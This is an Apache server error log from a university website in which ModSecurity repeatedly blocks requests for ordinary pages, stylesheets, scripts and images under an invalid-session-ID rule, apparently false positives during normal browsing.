[Mon Aug 28 08:13:45.889248 2023] [:error] [pid 38340] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJXEm@MAAAAM"]
[Mon Aug 28 08:13:46.062694 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ysCo-f0AAJS7R7wAAAAB"]
[Mon Aug 28 08:13:46.216048 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ysCo-f0AAJSr2xAAAAAO"]
[Mon Aug 28 08:13:51.283209 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv0z8Co-f0AAJKjaB0AAAAG"]
[Mon Aug 28 08:13:51.304695 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv0z8Co-f0AAJOr9-IAAAAL"]
[Mon Aug 28 08:13:51.313148 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv0z8Co-f0AAJSr2xIAAAAO"]
[Mon Aug 28 08:13:51.321210 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0z8Co-f0AAJWfZK0AAAAI"]
[Mon Aug 28 08:13:51.330793 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0z8Co-f0AAJXDU2gAAAAK"]
[Mon Aug 28 08:13:51.340718 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0z8Co-f0AAJXCvocAAAAJ"]
[Mon Aug 28 08:13:51.379427 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv0z8Co-f0AAJTind4AAAAE"]
[Mon Aug 28 08:13:51.389441 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv0z8Co-f0AAJWfZK4AAAAI"]
[Mon Aug 28 08:13:51.398601 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv0z8Co-f0AAJUGIYIAAAAC"]
[Mon Aug 28 08:13:51.407321 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv0z8Co-f0AAJXDU2kAAAAK"]
[Mon Aug 28 08:13:51.416452 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0z8Co-f0AAJSxY2EAAAAH"]
[Mon Aug 28 08:13:51.433397 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv0z8Co-f0AAJSr2xMAAAAO"]
[Mon Aug 28 08:13:51.447493 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv0z8Co-f0AAJTind8AAAAE"]
[Mon Aug 28 08:13:51.456447 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv0z8Co-f0AAJKjaB4AAAAG"]
[Mon Aug 28 08:13:51.467484 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv0z8Co-f0AAJUGIYMAAAAC"]
[Mon Aug 28 08:13:51.477628 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv0z8Co-f0AAJSxY2IAAAAH"]
[Mon Aug 28 08:13:51.487557 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv0z8Co-f0AAJOr9-MAAAAL"]
[Mon Aug 28 08:13:51.512649 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0z8Co-f0AAJWfZK8AAAAI"]
[Mon Aug 28 08:13:51.524869 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv0z8Co-f0AAJTineAAAAAE"]
[Mon Aug 28 08:13:51.535795 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv0z8Co-f0AAJSxY2MAAAAH"]
[Mon Aug 28 08:13:51.548757 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv0z8Co-f0AAJUGIYQAAAAC"]
[Mon Aug 28 08:13:51.558706 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv0z8Co-f0AAJXDU2oAAAAK"]
[Mon Aug 28 08:13:51.571553 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv0z8Co-f0AAJKjaB8AAAAG"]
[Mon Aug 28 08:13:51.581122 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv0z8Co-f0AAJTineEAAAAE"]
[Mon Aug 28 08:13:51.594988 2023] [:error] [pid 38340] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0z8Co-f0AAJXEm@QAAAAM"]
[Mon Aug 28 08:13:51.610898 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv0z8Co-f0AAJWfZLAAAAAI"]
[Mon Aug 28 08:13:51.635072 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv0z8Co-f0AAJXCvogAAAAJ"]
[Mon Aug 28 08:13:51.695180 2023] [:error] [pid 38340] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0z8Co-f0AAJXEm@UAAAAM"]
[Mon Aug 28 08:14:08.997422 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04MCo-f0AAJOr9-cAAAAL"]
[Mon Aug 28 08:14:09.061564 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv04cCo-f0AAJKjaCMAAAAG"]
[Mon Aug 28 08:14:10.026856 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJTineYAAAAE"]
[Mon Aug 28 08:14:10.263517 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJXCvowAAAAJ"]
[Mon Aug 28 08:14:10.559457 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJOr9-gAAAAL"]
[Mon Aug 28 08:14:10.743372 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJSr2xYAAAAO"]
[Mon Aug 28 08:14:10.885005 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv04sCo-f0AAJWfZLMAAAAI"]
[Mon Aug 28 08:14:11.043263 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv048Co-f0AAJOr9-kAAAAL"]
[Mon Aug 28 08:14:11.227574 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv048Co-f0AAJSr2xcAAAAO"]
[Mon Aug 28 08:14:11.527978 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv048Co-f0AAJS7R8IAAAAB"]
[Mon Aug 28 08:14:13.113199 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv05cCo-f0AAJXDU3AAAAAK"]
[Mon Aug 28 08:14:14.987636 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv05sCo-f0AAJUGIYkAAAAC"]
[Mon Aug 28 08:14:31.729181 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv098Co-f0AAJSxY28AAAAH"]
[Mon Aug 28 08:14:31.742704 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv098Co-f0AAJSr2x0AAAAO"]
[Mon Aug 28 08:14:31.748986 2023] [:error] [pid 38149] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv098Co-f0AAJUFNVwAAAAA"]
[Mon Aug 28 08:14:31.752836 2023] [:error] [pid 38338] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv098Co-f0AAJXCvpIAAAAJ"]
[Mon Aug 28 08:14:31.770666 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv098Co-f0AAJUGIYwAAAAC"]
[Mon Aug 28 08:14:31.795619 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv098Co-f0AAJTinesAAAAE"]
[Mon Aug 28 08:14:31.801355 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv098Co-f0AAJSxY3AAAAAH"]
[Mon Aug 28 08:14:31.848300 2023] [:error] [pid 37803] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv098Co-f0AAJOr9-4AAAAL"]
[Mon Aug 28 08:14:31.848340 2023] [:error] [pid 38149] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv098Co-f0AAJUFNV0AAAAA"]
[Mon Aug 28 08:14:31.850460 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv098Co-f0AAJTinewAAAAE"]
[Mon Aug 28 08:14:31.852219 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv098Co-f0AAJSxY3EAAAAH"]
[Mon Aug 28 08:14:31.904612 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv098Co-f0AAJUGIY0AAAAC"]
[Mon Aug 28 08:14:31.905091 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv098Co-f0AAJTine0AAAAE"]
[Mon Aug 28 08:14:31.932632 2023] [:error] [pid 37803] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv098Co-f0AAJOr9-8AAAAL"]
[Mon Aug 28 08:14:31.952367 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv098Co-f0AAJSr2x4AAAAO"]
[Mon Aug 28 08:14:31.954490 2023] [:error] [pid 38065] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv098Co-f0AAJSxY3IAAAAH"]
[Mon Aug 28 08:14:31.960653 2023] [:error] [pid 38338] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv098Co-f0AAJXCvpMAAAAJ"]
[Mon Aug 28 08:14:32.007404 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv0@MCo-f0AAJUGIY4AAAAC"]
[Mon Aug 28 08:14:32.011160 2023] [:error] [pid 38149] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv0@MCo-f0AAJUFNV4AAAAA"]
[Mon Aug 28 08:14:32.020049 2023] [:error] [pid 38339] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv0@MCo-f0AAJXDU3QAAAAK"]
